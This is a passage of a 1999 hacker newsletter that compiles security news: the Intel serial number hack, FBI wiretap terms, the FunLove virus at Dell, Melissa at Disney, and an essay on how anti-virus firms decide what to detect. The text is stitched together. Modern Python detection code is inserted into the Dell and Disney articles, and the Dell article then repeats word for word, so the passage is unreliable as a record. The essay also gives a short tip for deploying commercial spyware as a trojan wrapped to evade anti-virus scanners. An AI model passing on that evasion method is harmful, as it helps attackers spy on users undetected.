Intel included the feature as an additional security precaution for e-commerce and to aid corporations tracking technology assets. The number is "on," or can be read by a distant server, when the computer is turned on. Intel has shipped a software utility to PC makers that turns the serial code off. For greater security, manufacturers can also disable the code in the BIOS, or boot-up software. The BIOS patch hides the serial number at a much earlier point in time.

In addition, Intel confirmed today that certain mobile Pentium II and Celeron processors also contain the controversial serial code.

Zero's hack differs from a German technology publication's proposed method of getting around the disabling software utility, reported earlier. The magazine c't postulated that the serial code could be read upon awakening from energy-saving "deep sleep" mode, Hill said.

Intel has not yet seen Zero's software utility, and declined to comment on whether the hack actually disables the serial code utility. But as when c't pointed out that the software utility could be bypassed, company spokesman George Alfs noted that all software can be hacked.

"We would want to look at the code before we make a comment on that," Alfs said. "But the end user always needs to be aware of malicious software."

Zero-Knowledge recommends that consumers make certain that the serial code is disabled in the BIOS, Hill said.

"Intel built the serial number and was surprised by how seriously people take their privacy," Hill said.
"They said 'theoretically it may be broken'--it turns out it's not that theoretical after all."

@HWA

31.0 Security Lawsuits Next After Y2K
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond

Fred Smith, an attorney at Panagakos and Wirth, Santa Fe, N.M., seems to think that lawsuits regarding software security in e-commerce will be the next big thing after Y2K. (Wonder how the Uniform Commercial Code that exempts all software from any liability will figure into these lawsuits.)

CMP Techweb
http://www.techweb.com/wire/story/TWB19991117S0005

Security Lawsuits To Replace Y2K Litigation
By Mary Mosquera, TechWeb
Nov 17, 1999 (8:13 AM)
URL: http://www.techweb.com/wire/story/TWB19991117S0005

Washington, D.C. -- Lawsuits involving computer security in e-commerce will explode after Y2K litigation runs out of steam, which could be quicker than originally believed.

It appears that the deluge of Y2K lawsuits will not happen because of legislation that protects companies that share information about their Y2K vulnerabilities and limits on litigation related to problems caused by Y2K computer glitches.

Instead, lawsuits may be in response to computer security guarantees that failed or lapses in security within a network because some of those responsible may not know enough, said Fred Smith, an attorney at Panagakos and Wirth, Santa Fe, N.M. There may also be more typical fraud in e-commerce, such as non-performance of contract, credit card fraud, or one company falling victim to a fraudulent but seemingly legal virtual venture, he said.

Speaking at the Computer Security Institute's conference here, Smith said lawyers want to jump into the sphere of e-commerce litigation. "But the legal process is not working," he said. "Developing new law won't catch up with the speed of technology."
As a result, companies doing business online need to include as part of their computer security plans the ability to collect digital evidence that can be used to defend themselves, to prosecute, or to use if they are a witness, said Mark Pollitt, chief of the FBI's computer analysis response team.

But companies have no best practices or standards yet on which to develop their network security. And the judicial system has no set of statutes addressing problems particular to security in e-commerce, Smith said.

It is all new territory for companies to consider how secure they can make their networks without privacy implications, how to collect digital evidence that would be clear and stand up in court, and how to consider other countries' laws since so much of e-commerce is global, Pollitt said.

"Companies have to start thinking about being evidence gatherers and that they will sue or be sued at some time," Smith said.

Evidence -- which may be e-mails, digital images, or a network security plan -- must be able to be presented as a story in court so attorneys, judges, and juries can understand, Smith said.

@HWA

32.0 Another Singaporean Cyber Intruder Pleads Guilty
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by no0ne

18-year-old Peng Yuan Han, an Anglo-Chinese Junior College student, pleaded guilty to unauthorized use of a computer service, unauthorized access and modifications to a computer, and abetting unauthorized access. He admits to having electronically broken into the systems of the National Computer Board (NCB), Ministry of Education (MOE) and Nanyang Technological University (NTU). (It would be interesting to see what would happen if someone actually pleaded innocent and fought such a charge.)
The Straits Times
http://straitstimes.asia1.com.sg/cyb/cyb1_1117.html

url not found - Ed

@HWA

33.0 SingCERT Releases Year to Date Stats
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by no0ne

SingCERT has released statistics on the online threats that have been reported to it up to October of this year. They have reported over seventeen different viruses infecting Singaporean users, with over 400 victims from Chernobyl alone. 49 cases of illegal scanning had been reported and 27 cases of unauthorized intrusions. (Interesting, but why are the numbers so low?)

Straits Times
http://straitstimes.asia1.com.sg/cyb/cyb2_1118.html

Straits Times - Yes, they had two stories
http://straitstimes.asia1.com.sg/cyb/cyb1_1118.html

wtf. urls not found again ... - Ed

@HWA

34.0 Canadian Telecom Firm Gets Security Clearance
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by cult hero

TMI Communications Inc. will be the first to offer satellite telecommunications services in the U.S. market. They have been granted approval after they agreed to allow US law enforcement agencies to install wiretap capability into their systems. The agreement came after the US agencies agreed not to spy on Canadian citizens.

Canoe
http://www.canoe.ca/MoneyNewsTechnology/sept13_tmisatellite.html

Monday, September 13, 1999
Technology News

TMI sets precedent with U.S. deal
Wins security clearance: Telecom firm agrees to wiretaps -- but not on Canadians

By PETER MORTON
The Financial Post

WASHINGTON - A tiny Canadian satellite communications company will be the first foreign firm to receive top security approval from the FBI to operate a telecommunications business in the United States after agreeing to allow U.S. security agencies to wiretap its service.

The precedent-setting deal, to be signed today, will soon allow TMI Communications Inc. to offer satellite telecommunications services in the U.S. market, Larry Boisvert, TMI's chief executive, confirmed in an interview.

"If you want to provide telecommunications in the U.S. you have to be prepared to meet the security required as determined by the FBI and the Department of Justice," Mr. Boisvert said.

Even though it will operate the service from Canada, TMI agreed to put a digital switch in the United States that would give FBI and other U.S. security agencies the ability to listen in on satellite calls or copy data, such as financial records, as required by new federal laws that will force all U.S. mobile communications companies to do the same by next June.

As first reported by the National Post in June, the FBI had blocked TMI from getting a Federal Communications Commission licence because it was worried that criminals or terrorists would use foreign-based telecommunications companies to avoid wiretaps. The FBI has complained it cannot easily tap phone calls going through foreign countries.

The new agreement, which comes after 17 months of negotiations, would put TMI's switch on U.S. soil, something the FBI plans to demand of any other foreign telecom company wanting to offer services in the United States as part of the 1994 Communications Assistance for Law Enforcement Act, said Mr. Boisvert.

"It's going to cost us to do business in the U.S.," he said. "But if you're going to play in someone else's market, you got to be CALEA compliant."

A key part of the two agreements being signed today includes one between Canada and the U.S. that prohibits the FBI and any other security agency from tapping the calls being made by, or to, Canadian citizens. Ottawa had balked at giving the FBI blanket access, saying it wanted to protect the privacy of Canadians.

Mr. Boisvert insisted the reason the negotiations took so long was not because the U.S. government had security concerns about Telesat or Canada.
Rather, he said, the Department of Justice was being extraordinarily careful because the TMI deal would be the model for all other foreign telecommunications companies wanting access to the U.S. market.

The United States and 130 other countries agreed in February 1997 to open their telecommunication markets to foreign competition. At the time, however, the United States insisted its security concerns had to be met first, but did not spell out what that meant until TMI became the first foreign telecommunications company to apply for an FCC licence a year later.

"Security became the key issue," said Mr. Boisvert. "I suspect this will be a surprise to a lot of others waiting behind us."

Besides TMI, which is owned by Telesat Canada Inc. and BCE Inc., Globalstar Canada LP, a partnership of U.S. Globalstar and Canadian Satellite Communications, is also looking to offer U.S. telephone service using Canadian facilities.

TMI is hoping to be the first out of the gate to not only offer conventional satellite telephone services, but also to get into two new areas in Canada and the United States -- one involving data transmission and the second called asset management.

Mr. Boisvert said TMI is about to roll out the second service in Canada. It essentially involves placing tiny transmitters on everything from railway cars to trucks to allow companies to know exactly where their goods are anywhere in the country. In addition, TMI is talking to major U.S. utilities about installing the devices in homes and businesses so they can remotely track electricity use.

"You don't have to send someone to the home to read the meters," he said. "The applications are enormous."

The deal being signed today clears the way for TMI to receive an FCC licence after pledging to have the new security features in place before next June.
The FCC was worried that demands by the FBI and the Department of Justice would be so onerous that no foreign telecommunications company would want to compete in the U.S. market, something that could set the stage for retaliation against U.S. companies around the world.

@HWA

35.0 Dell Gets Some FunLove
     ~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

The production systems of Dell Computer's Limerick, Ireland plant were infected with the FunLove virus, causing the plant to shut down for two days and a recall of 12,000 systems. No viruses were later found on customer systems.

Irish Times
http://www.ireland.com/newspaper/front//1999/1118/fro3.htm

Virus at Dell's Limerick plant costs firm millions

By Madeleine Lyons and Éibhir Mulqueen

A virus in the production systems of computer giant Dell's Limerick plant is understood to have cost the company millions of pounds. Work at the complex, which employs 3,400 people, was suspended for at least two working days and 12,000 computer units were recalled for checking.

The so-called FunLove virus was identified in Dell's production process last Thursday afternoon. It was discovered in systems used to install software in newly-built computers. Production was shut down immediately and 12,000 units, which the company calculated may have been affected, were recalled.

Dell builds computers to order and delivers them automatically on completion. According to a spokeswoman for Dell, only 500 units had reached their final destination and each of the customers involved was contacted by the company. These units - and the remaining 11,500 computers in transit - were checked over the weekend and all were found to be free of the virus. Normal production resumed on Monday afternoon.

"When the virus was detected first, we had to take immediate precautions to ensure the shipped units were not contaminated," the spokeswoman said.
Dell refused to put a figure on the cost of the disruption but one industry source estimated that it may have cost as much as £14 million. The spokeswoman said production was not scheduled over the weekend because the company had just completed its latest quarter involving round-the-clock operations. Dell now plans to make up the lost production hours through overtime and weekend work. According to the company, orders placed for desktop computers since Monday will be delayed by two days, while the estimated wait for other products is expected to be slightly longer.

The FunLove virus infects both desktop computers and computer servers running Windows 95, 98 and Windows NT operating systems. As it spreads it increases the size of the files it infects by placing a copy of itself at the end of the infected file. When the file is opened under the basic operating system DOS, it launches the message "Fun Loving Criminal".

Anti-virus companies said last week that FunLove would be easy to control as long as standard anti-virus procedures were implemented. Dell says it installed a "fix" early on Thursday and the virus was detected in internal systems that afternoon.

A number of Irish companies took measures last week to protect their computer systems against the same virus. They included Bank of Ireland, AIB, Ericsson, Microsoft, Eircom, the Revenue Commissioners and Smurfit.
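The infection pattern the article describes (the original program left intact, a copy of the virus tacked onto the end, so the file grows) is exactly what a build-line integrity baseline can catch: hash the first N bytes of each program where N is its baseline size, and a file that grew while its prefix still matches was appended to, not updated. The check below is an added example, not Dell's, the Irish Times', or any anti-virus vendor's code; the file names, sizes and appended bytes are constructed for it.

```python
import hashlib
import os
import tempfile
from typing import Dict, Iterable, Tuple

# path -> (size at baseline time, sha256 of the whole file at baseline time)
Baseline = Dict[str, Tuple[int, str]]


def sha256_prefix(path: str, length: int) -> str:
    """SHA-256 over the first `length` bytes of `path` (all of it if shorter)."""
    digest = hashlib.sha256()
    remaining = length
    with open(path, "rb") as fh:
        while remaining > 0:
            chunk = fh.read(min(65536, remaining))
            if not chunk:
                break
            digest.update(chunk)
            remaining -= len(chunk)
    return digest.hexdigest()


def take_baseline(paths: Iterable[str]) -> Baseline:
    """Record size and full-file digest for every program file we want to watch."""
    baseline: Baseline = {}
    for path in paths:
        size = os.path.getsize(path)
        baseline[path] = (size, sha256_prefix(path, size))
    return baseline


def classify(path: str, baseline: Baseline) -> str:
    """Compare one file against its baseline entry.

    'appended'  : grew, but the first baseline-size bytes still match, i.e. the
                  original program is intact and extra code was added at the end
    'modified'  : the original bytes themselves changed (in-place update or tamper)
    'truncated' : shrank
    'unchanged' : identical size and digest
    """
    if path not in baseline:
        return "unknown"
    if not os.path.exists(path):
        return "missing"
    base_size, base_digest = baseline[path]
    size = os.path.getsize(path)
    if size < base_size:
        return "truncated"
    # Hash only the original-length prefix, so appended bytes cannot mask a match.
    if sha256_prefix(path, base_size) == base_digest:
        return "unchanged" if size == base_size else "appended"
    return "modified"


def scan(baseline: Baseline) -> Dict[str, str]:
    return {path: classify(path, baseline) for path in baseline}


def demo() -> Dict[str, str]:
    """Constructed scenario in a temp dir: three fake program images; one gets a
    body appended the way the article describes, one is patched in place, one is
    left alone. Returns {basename: verdict}."""
    workdir = tempfile.mkdtemp()
    images = {
        "setup.exe": b"MZ" + b"\x90" * 4000,
        "installer.exe": b"MZ" + b"\x00" * 2000,
        "tool.exe": b"MZ" + b"\xcc" * 1000,
    }
    paths = {}
    for name, body in images.items():
        paths[name] = os.path.join(workdir, name)
        with open(paths[name], "wb") as fh:
            fh.write(body)
    baseline = take_baseline(paths.values())

    with open(paths["setup.exe"], "ab") as fh:       # appending-infector pattern
        fh.write(b"CONSTRUCTED-APPENDED-BODY" * 100)
    with open(paths["installer.exe"], "r+b") as fh:  # legitimate in-place patch
        fh.seek(100)
        fh.write(b"\xff" * 16)

    return {os.path.basename(p): verdict for p, verdict in scan(baseline).items()}


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name}: {verdict}")
```

An 'appended' verdict on a file that has no legitimate reason to change on a software-staging host is the signal to pull the image before it ships, which is the check that would have flagged the staging systems before 12,000 units went out.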
Production was shut down immediately and 12,000 units, which the company calculated may have been affected, were recalled. Dell builds computers to order and delivers them automatically on completion. According to a spokeswoman for Dell, only 500 units had reached their final destination and each of the customers involved was contacted by the company. These units - and the remaining 11,500 computers in transit - were checked over the weekend and all were found to be free of the virus. Normal production resumed on Monday afternoon. "When the virus was detected first, we had to take immediate precautions to ensure the shipped units were not contaminated," the spokeswoman said. Dell refused to put a figure on the cost of the disruption but one industry source estimated that it may have cost as much as £14 million. The spokeswoman said production was not scheduled over the weekend because the company had just completed its latest quarter involving around the-clock operations. Dell now plans to make up the lost production hours through overtime and weekend work. According to the company, orders placed for desktop computers since Monday will be delayed by two days, while the estimated wait for other products is expected to be slightly longer. The FunLove virus infects both desktop computers and computer servers running Windows 95, 98 and Windows NT operating systems. As it spreads it increases the size of the files it infects by placing a copy of itself at the end of the infected file. When the file is opened under the basic operating system DOS, it launches the message "Fun Loving Criminal". Anti-virus companies said last week that FunLove would be easy to control as long as standard anti-virus procedures were implemented. Dell says it installed a "fix" early on Thursday and the virus was detected in internal systems that afternoon. A number of Irish companies took measures last week to protect their computer systems against the same virus. 
They included Bank of Ireland, AIB, Ericsson, Microsoft, Eircom, the Revenue Commissioners and Smurfit.

@HWA

36.0 Melissa Hits Disney
     ~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by turtlex

Melissa is still around wreaking havoc; this time it was Disney Corporation. A variant of Melissa known as Melissa.A infected an internal memo which it then proceeded to mail out to several members of the press. Luckily the memo did not reveal any corporate secrets, this time.

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2396724,00.html?chkpt=zdhpnews01

--------------------------------------------------------------
This story was printed from ZDNN, located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------

Spies hit Disney? No, just Melissa
By Rob Lemos, ZDNN
November 17, 1999 6:07 PM PT

The Melissa virus was behind an e-mail spam from Walt Disney Co. Wednesday. Disney (NYSE: DIS) inadvertently spammed a host of press members with an internal memo, because the Melissa.A virus, which had infected the memo, mailed out the attachment to a list of people from the company's address book.

The memo -- from Disney Vice Chairman Sandy Litvack -- described policy changes in the dates that employees (called "cast members" in Disney-speak) could attend the company's trademark theme parks for no charge.

While the incident doesn't appear to have caused any harm, it underscores the potential for computer viruses -- especially macro viruses -- to not only damage data, but to inadvertently publicize it as well.

"There is a danger that any type of virus that sends out e-mail, especially macro viruses, could do something like this," said Darren Kessner, a senior virus researcher at Symantec Corp.'s Anti-virus Research Center.

The Melissa virus, which struck late last March, spawned a number of copycats, including Melissa.A -- the variant that hit Disney.
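The mass-mailing described here has a signature that is visible at the mail relay without looking at the macro at all: one sender pushing the same Office attachment to a large number of distinct recipients within a few minutes. The Python below is an added example of that detection, not Disney's or Symantec's code and not part of the ZDNN article, run over a constructed relay log whose line format is an assumption; the thresholds and the `MACRO_CAPABLE` extension list are assumptions as well.

```python
"""Relay-side detection of a mass-mailer: one sender, one Office attachment, many
distinct recipients inside a short window.  Log format is an assumption."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed one-line-per-delivery relay log; 'attach'/'sha1' are absent for bare messages.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) from=(?P<sender>\S+) to=(?P<rcpt>\S+)"
    r"(?: attach=(?P<attach>\S+) sha1=(?P<sha1>[0-9a-f]+))?$"
)
# Office formats that can carry VBA macros (assumed list for the rule).
MACRO_CAPABLE = (".doc", ".dot", ".xls", ".xlt")


def parse(lines):
    """Turn log lines into event dicts; lines that are not delivery records are skipped."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        event = m.groupdict()
        event["ts"] = datetime.fromisoformat(event["ts"])
        events.append(event)
    return events


def find_bursts(events, window=timedelta(minutes=5), threshold=25):
    """Return (sender, attachment, sha1, recipients) for every sender/attachment pair
    that reached at least `threshold` distinct recipients within any `window` span."""
    by_key = defaultdict(list)
    for e in events:
        if e["attach"] and e["attach"].lower().endswith(MACRO_CAPABLE):
            by_key[(e["sender"], e["attach"], e["sha1"])].append((e["ts"], e["rcpt"]))
    alerts = []
    for key, deliveries in by_key.items():
        deliveries.sort()
        start, peak = 0, 0
        for end in range(len(deliveries)):
            while deliveries[end][0] - deliveries[start][0] > window:
                start += 1  # slide the window forward
            peak = max(peak, len({rcpt for _, rcpt in deliveries[start:end + 1]}))
        if peak >= threshold:
            alerts.append(key + (peak,))
    return alerts


def sample_log():
    """Constructed log: a macro-capable memo blasted to 50 recipients in under two
    minutes, plus routine traffic that must not trip the rule."""
    t0 = datetime(1999, 11, 17, 14, 2, 11)
    lines = []
    for i in range(50):
        ts = (t0 + timedelta(seconds=2 * i)).isoformat()
        lines.append(f"{ts} from=castmember@studio.example to=press{i}@news.example "
                     f"attach=memo.doc sha1=ab12cd34")
    for i in range(10):  # one payslip every half hour: same attachment, no burst
        ts = (t0 + timedelta(minutes=30 * i)).isoformat()
        lines.append(f"{ts} from=payroll@studio.example to=staff{i}@studio.example "
                     f"attach=slip.doc sha1=99ff00aa")
    lines.append(f"{t0.isoformat()} from=ops@studio.example to=all@studio.example")
    return lines
```

The rule keys on sender plus attachment digest so that a user legitimately mailing many different documents is not flagged, and it counts distinct recipients so that delivery retries do not inflate the number; the short window is what separates the Melissa pattern from a newsletter that goes out over a working day.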
When an infected document is opened, the virus infects the Word template file -- the starting point for all new Word documents -- and mails the currently open document to the top 50 addresses in the Microsoft Outlook address book. Systems that are set to 'medium' or 'high' security will notify the user that a macro is being run. Those systems that do not use Microsoft Outlook as a mail client will not send out the mass e-mailing.

The variant does not destroy any data on the infected system. However, if a document is created on an infected system, mailed to another user, and opened with Microsoft Outlook, the new document will be sent to the top 50 addresses on the new system. This appears to be what happened with the Litvack document.

Erik Wedin is one of two Disney employees who inadvertently sent out the infected document to a large number of press members. In an e-mail message to ZDNN, Wedin insisted that Disney uses anti-virus software. "Our I.S. team is trying to figure out why (the virus) wasn't caught," he wrote.

"It's amazing that they didn't have more up to date anti-virus software in place," said Symantec's Kessner.

While the incident highlights the danger of viruses causing information leaks at companies, Kessner downplayed the danger of viruses being intentionally used for industrial espionage. "This is not the best way," he said. "Furthermore, most virus writers are not interested in the information they can get. They are more interested in getting their name out."

@HWA

37.0 How the Anti Virus Industry Works
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by RenderMan

So what exactly does it take for a piece of software to end up in a virus scanning package as something to be scanned for? Why is commercial spy software not scanned for but freeware tools that do the same thing are? A new article in the Buffer Overflow section takes a look at the Anti Virus companies and what the criteria are.
Buffer Overflow
http://www.hackernews.com/orig/buffero.html

How the A/V Industry Works
By: Renderman, Www.Hackcanada.com
RenderMan@Hackcanada.com

What do I remember most about DEFCON 7? The mosh pit of Anti-Virus employees at the release of BO2K. Several dozen A/V people from different companies, risking life, limb and large insurance deductibles to get their company the first samples of BO2K, was one of the funniest things I remember. At the time it made sense to risk injury to get a copy; the media would reward the first company with a BO2K detection signature with immense amounts of free advertising. After all, this was the latest and greatest Trojan/backdoor, right?

Well, after seeing Dildog's presentation and the following open challenge to M$ to recall SMS server, the general description of BO2K changed. After initially trying BO2K on an isolated test machine to make sure I didn't screw myself, it has now become my primary method of remote administration on a multiple system 9X/NT network because it is just a damn good program. My opinion now: the anti-virus industry people didn't need to be there. This was a well designed remote control product that happened to be written by hackers, and as with any tool, in the wrong hands it can be dangerous.

In the months following DEFCON, products such as Softeyes (http://www.softeyes.com), and Investigator from Winwhatwhere (http://www.winwhatwhere.com/), and other products that are designed to do much of what the A/V industry says makes a program malicious, are not scanned for. When a product can advertise "watches and records everything about every window that gains the focus. It records every keystroke, program name, window title, URL, User and Workstation and the optional 'Silent Install' feature will run the installation silently and invisibly" and not be scanned for, it begs the question: how do you decide?
Also you may recall the problems that the folks over at NetBus had when they went commercial and started charging for their product. They had a hard time shedding the image of a hacking tool. This really rattled a lot of people's cages because the logic that was in use by the people who are saying certain programs are malicious does not make sense when you add these new programs to the mix. Just looking at C|net's technology terror guide (Technology Terrors) you can see the number of products that aren't on any A/V list that are as dangerous, if not more, than BO2K.

This whole thing boils down to the question: how do A/V companies decide what criteria make a piece of code worth being scanned for? Well, rather than rant on like others might do, I went to the source. I looked on A/V sites for a policy statement or a set of internal guidelines. Nothing found. So I sent a mail like any other customer to the customer support department (and if it existed, the A/V research department as well) of the major A/V companies: Symantec, NAI, AVP, Computer Associates, and Panda Software. There were others that could also qualify, but these are what you find most on store shelves. To all the companies I sent the same letter:

Dear Sir/Madam,

With recent events in the virus industry, it has become apparent to myself and many others that there seems to be a definite bias when it comes to how companies like yours determine what should and should not be scanned for. By what policy do you decide what should be scanned for and eliminated and what is 'legitimate'? After an examination of your web site, no policy statement could be found. Can you clarify what criteria make a product malicious or a legitimate product?

Thanks
RenderMan
www.Hackcanada.com

As you can see, the letter states my conundrum and the clarification I need, and I don't try to hide who I'm mailing as. I waited a couple weeks for the responses to accumulate and re-sent some that I did not receive responses from.
In over two weeks I only received 3 responses. First was a very quick response from Symantec customer support from a gentleman who I think was having a really bad day and was not happy to see me. Here is his message with my comments inserted:

I can assure you that Symantec has absolutely no bias towards any legitimate software developers

(What makes a software developer legitimate, is there a license I'm not aware of? I thought anyone could code?)

Arguments by some hackers that certain hacker tools are actually legitimate commercial software are themselves extremely biased to the point of not making any sense

(I agree we are biased to a point just as you are, but what makes something a hacker tool or a mis-used administration tool?)

A good recent news story about this subject is available for reading at this web page, http://www.msnbc.com/news/287542.asp. Both Symantec management and management at other Anti-Virus developers are quoted in this article about this subject. We really would not have anything further to add to these comments on this subject.

(The article does not really answer what I was asking.)

Best regards,
(name omitted)

After not answering my original question, I responded because I thought they still had something they could add. This time I went and asked exactly how they decide what should and should not be detected and gave an example:

Interesting article you reference, but it still does not answer my question. What is your company's policy on determining what should and should not be detected in your Anti-Virus scans? What is defined by your company as legitimate software developers? Are independent developers not in the same boat as large companies such as yourselves? What is preventing Back Orifice 2000 from being a legitimate tool? In the article you specified it says "anyone with the other half of the Back Orifice software (the administration tool) can control the victims PC from anywhere on the Internet".
Can not the same be said for your product pcAnywhere? I really appreciate you trying to clear this question up for me.

RenderMan
www.Hackcanada.com

The bit about pcAnywhere was meant to try and get my point across that the differences between good and evil code are blurred. I myself have taken over the computers of friends (with permission) who use PC Anywhere without passwords and the effect is just the same as using BO2K. His response was less than pleasant, but interesting. Again, here is a transcription with my comments:

I'm afraid that this is not at all a legitimate question that you ask here.

(I'm a customer, I want to know so I can know if your product will protect me from anything that can be bad.)

You know, you aren't even giving me the common courtesy of identifying yourself.

(ummm, I signed my name at the bottom, that usually is all people do. The support center never stated anything about needing my full information in order to receive customer support.)

Symantec operates our discussion groups as a support resource for our customers to use to get help from us. They are not meant for engaging in debates like this.

(Whoa, hold on, I really am a customer of Norton A/V, and I'm asking a question, how do you decide what to scan for? This is a customer inquiry.)

pcAnywhere is not designed to be installed silently and secretly in the background on a system. It was also not announced at a hackers convention.

(So if it announces its presence but formats your drive without asking it's OK? Since when does the location of announcement mean anything about the product itself?)

(name omitted)

After that, I let him get back to blowing off other customers' questions. MS announced DirectX 2 at a conference done along the theme of ancient Rome. Does this mean DirectX is a technology for guys in robes and olive branches? I think not. Fortunately this response from Symantec was not indicative of all the responses I received.
NAI customer support responded quickly as well, this time with a definitely different tone.

If a program reproduces itself, we call it a virus. If it does something that the user does not expect, we call it a trojan. If it is harmless and funny we call it a joke.

(Not a bad, though short, summary.)

There are other categories that could be considered such as Hack tools, BackDoors, worms and Password Stealers.

(Now it gets weird. Does L0phtCrack count as a password stealer, or a hacktool, or as just another damn good program?)

NAI wasn't clear but I was getting closer. NAI also sent the 3rd and final response that really got me thinking.

Thanks for your question. The criteria, although not obvious, is simple among researchers. The detections are mainly customer driven; that is, if a client requests detection of a particular problem then it is taken into account. Many of the detections received come from shared collections, collections that are shared among A/V vendors. Some of the detections are from samples received from customers and others are from sites referred to us from customers who feel there is a valid threat.

Regards,
(name omitted)
Sr Virus Support Analyst
AVERT - a division of nai
//* We eat viruses for breakfast, lock and load *//

Ding, Ding, Ding, We have a winner. The last line: "others are from sites referred to us from customers who feel there is a valid threat." So, the A/V industry uses a common database and submissions from customers..... I'm a customer and I want Investigator, softspy, pcAnywhere and SMS scanned for. I submit to you samples of each to add to your databases. There is no way to get BO2K off the lists, the media just won't have it. But by using the normal submission procedure for suspicious files, it may be possible to add other programs of similar features to the database and make the A/V industry re-think itself.
I encourage everyone who has legitimate access to any program that can be used maliciously to submit it to the A/V industry through their virus submission e-mail addresses. A hacker's version of a letter writing campaign. One person submitting these programs will be labeled a crackpot; many, on the other hand, will have an effect. I for one want a level playing field. If there is a program on my system that can record my keystrokes, passwords, bank account numbers and ship it off anywhere without telling me, I want to know about it.

If a person wanted to use a trojan for nefarious purposes they need just be a little creative. Just spend the $100 or so on Investigator or a similar program, use something like Silk Rope to wrap the executable with some benign little program and deploy at will. This is a common tactic used to deploy trojans but with this method, not a word will be uttered by any A/V product and the attacker can go along on his merry way unfettered. So unless the A/V industry changes its position on what makes a piece of code malicious, smart trojan users will fly on by using 'legitimate' products. But why should they scan for those products? After all, they weren't released at a hacker convention :-)

RenderMan
www.Hackcanada.com
RenderMan@Hackcanada.com

@HWA

38.0 FBI Releases Anti Cyber Crime Video
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Space Rogue

The FBI has released a new video aimed at the high-tech industry across the country. It is hoped that the tape will encourage companies to report computer break-ins to the federal government. The tape contains scenes showing government officers catching three California teens who had electronically broken into numerous computer networks in the Pentagon. The FBI says that not enough firms are reporting computer crime to the federal government and are instead covering them up. (First they say they are overworked and understaffed, now they want even more work to do.
Yeah, makes sense to me. Anyone know how to get a copy of the tape? I need a good laugh.)

Yahoo News - Anyone have a better link for this?
http://dailynews.yahoo.com/headlines/local/state/colorado/story.html?s=v/rs/19991118/co/index_2.html#3

Late Update 0948111999EST

Thanks to devost for sending us a better link. We now know that the title of the video is "Solar Sunrise: Dawn of a New Threat" and should be available at better FBI offices everywhere.

Excite News
http://news.excite.com:80/news/u/991117/19/tech-infowar

Yahoo;

F-B-I Makes Hacker Video

(STATEWIDE) -- The F-B-I has made a new video aimed at the high-tech industry in Colorado and across the country. The tape is supposed to encourage companies to report computer break-ins to the federal government. It shows government officers catching three California teens who had hacked their way into at least 11 computer networks in the Pentagon. Right now... the F-B-I says... most firms hire private companies to track down hackers. But the federal government says...reports of computer break-ins are crucial to national security.

-=-

Excite;

Feds put happy face on infowar
Updated 7:14 PM ET November 17, 1999
By PAMELA HESS

WASHINGTON, Nov. 17 (UPI) As part of an effort to sell industry on its nascent computer crime investigation unit, the FBI has just completed an entertaining, slick video detailing how they caught three teenagers who were behind the famed February 1998 information warfare attack on at least 11 Defense Department networks as the military prepared for a renewed war on Iraq. The Pentagon considers the incident, known as Solar Sunrise, the opening volley in a new age of warfare that exploits personal computers and the Internet to cripple military operations. A similarly notorious attack known as Moonlight Maze is still ongoing and is believed to be coming out of Russia. That case has not yet been solved.
The video, "Solar Sunrise: Dawn of a New Threat," recounts how two California teenagers, coached by an Israeli teen hacker known as "Analyzer," routed through scores of networks to gain entry into unclassified Defense Department networks that housed sensitive troop deployment and logistics information. The hackers started on Feb. 3 and were tracked down by Feb. 25. The California boys are on three years of probation. The Analyzer is under indictment in Israel but is currently fulfilling his military service.

The video was publicly shown for the first time at a cyberterrorism conference in Washington, D.C., on Tuesday. A government official who asked not to be named explained that the video would be distributed to local FBI detachments to help them convince local law enforcement authorities and private companies to alert the FBI when computer break-ins occur.

Concern exists in industry, especially in the financial sector, where public perceptions can immediately affect the bottom line, that bringing the FBI into a case of hacking increases the chances the incident will leak out to the public. In many cases, they have preferred to handle it with private security firms.

The FBI considers knowing about the incidents critical to national security. Hackers do not target government agencies alone; they also bounce off private networks. Tracking that activity can provide important indications of coming major attacks, both cyber and physical, they contend.

@HWA

39.0 Adobe Introduces Potentially Flawed Security System
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by RABID.RAT

Adobe has introduced what they call a secure digital delivery system which they hope will prevent the unauthorized distribution of PDF documents. Adobe hopes to accomplish this by using the unique serial number located on Zip, Jaz, or Clik disks as a component of their encryption system.
(Ok, for those that are unfamiliar with encryption, this whole scheme is based on a secret number, the unique serial number on the disk. This number is "inaccessible to end users" according to Adobe. Of course if the Adobe software can access the number then an end user may be able to figure it out too. Once you have the number it should be pretty trivial for a good cryptographer to figure out the rest. This is really pretty sad.)

Adobe
http://www.adobe.com/epaper/features/iomega/main.html

Note: We have not actually looked at the encryption mechanism used by Adobe and have based the above comments only on what little information is available on their web site.

Adobe;

ADOBE TEAMS WITH IOMEGA TO OFFER A SECURE DIGITAL DELIVERY SYSTEM
By Lisa Anderson

Do you own any disks containing sensitive or copyrighted content? If so, do you worry that someone could illegally copy and use that information? Adobe and Iomega have teamed up to answer this common concern with a secure digital delivery system that prevents unauthorized distribution of Adobe® Portable Document Format (PDF) files stored on portable media. Adobe is helping publishers, distributors, retailers, and consumers to exchange electronic content securely by tying the use of that content to specific types of portable media and hardware.

